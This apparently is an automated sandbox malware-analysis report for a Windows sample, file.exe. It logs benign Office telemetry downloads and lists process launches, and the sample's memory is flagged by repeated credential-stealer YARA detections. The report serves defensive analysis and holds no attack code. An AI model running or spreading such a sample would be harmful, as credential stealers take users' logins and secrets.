                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              143192.168.2.64991213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:10 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:10 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                              x-ms-request-id: f92a0347-601e-005c-7f58-3cf06f000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124010Z-15b8b599d88vp97chC1TEB5pzw00000004bg00000000crrd
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:10 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              144192.168.2.64991313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:11 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:12 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                              x-ms-request-id: efd631bc-c01e-008d-6f47-3c2eec000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124012Z-15b8b599d889gj5whC1TEBfyk0000000045000000000gmur
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:12 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              145192.168.2.64991513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:12 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:12 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:12 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                              x-ms-request-id: 1829e788-d01e-0017-723f-3eb035000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124012Z-15b8b599d88hr8sfhC1TEBbca400000004b0000000006vq7
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:12 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              146192.168.2.64991413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:12 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:12 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                              x-ms-request-id: 15687058-401e-005b-477d-3b9c0c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124012Z-174c587ffdfgcs66hC1TEB69cs000000048g00000000c04b
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:12 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              147192.168.2.64991613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:12 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:12 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE584C214"
                                                                                                                                                                                              x-ms-request-id: ba74c404-401e-00a3-156e-3d8b09000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124012Z-15b8b599d889fz52hC1TEB59as00000004eg000000006b39
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:12 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              148192.168.2.64991713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:12 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:12 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1407
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                              x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124012Z-174c587ffdfb485jhC1TEBmc1s00000004b0000000003v72
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:13 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              149192.168.2.64991813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:14 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:14 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1370
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                              x-ms-request-id: 0ac0d454-901e-0015-334f-3cb284000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124014Z-15b8b599d88qw29phC1TEB5zag00000004fg000000004bpz
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:14 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:07:38:59
                                                                                                                                                                                              Start date:24/11/2024
                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                              File size:1'860'096 bytes
                                                                                                                                                                                              MD5 hash:1EB940602D253A449C44E9ECFD4714C4
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2240378061.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2262622308.0000000001233000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2186122101.0000000001226000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2262259485.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2238456679.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2185573560.0000000001233000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2264702772.0000000001234000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2214176802.0000000001226000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2262576361.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2238942024.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2264739718.000000000123D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:07:39:36
                                                                                                                                                                                              Start date:24/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                              Start time:07:39:37
                                                                                                                                                                                              Start date:24/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2436,i,13883662097603284509,5735806010481988831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                              Start time:07:39:41
                                                                                                                                                                                              Start date:24/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                              Start time:07:39:42
                                                                                                                                                                                              Start date:24/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,3177487743473689388,10012693031284183777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              No disassembly